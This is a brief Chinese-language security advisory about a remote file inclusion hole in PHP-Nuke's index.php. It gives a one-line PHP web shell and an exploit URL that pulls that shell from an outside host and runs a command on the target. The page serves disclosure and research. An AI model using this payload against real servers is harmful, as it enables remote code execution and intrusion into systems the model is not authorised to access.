您当前的位置 >> 首页     

PHP-Nuke 执行攻击者任意命令漏洞

/ns/ld/softld/data/20020311145136.htm

涉及程序:
PHP-Nuke

描述:
PHP-Nuke 执行攻击者任意命令漏洞

详细:
发现 PHP-Nuke 存在漏洞,问题出在 index.php 的包含文件特性中,它允许包括诸如 index.php?file=file 的文件。远程攻击者利用此漏洞,能在受影响机器上执行任意代码。


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


构造下面的 PHP 文件:
<?php
system($cmd);
?>

再提交这样的请求:

http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al

受影响系统将会执行 ls -al 命令


解决方案:
尚无

关于我们 | 加入我们 | 网站结构 | 交换连接 | 联系我们

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Network Security Group.
All Rights Reserved.
W3C XHTML 1.0 Strict & CSS 1.2 Valid.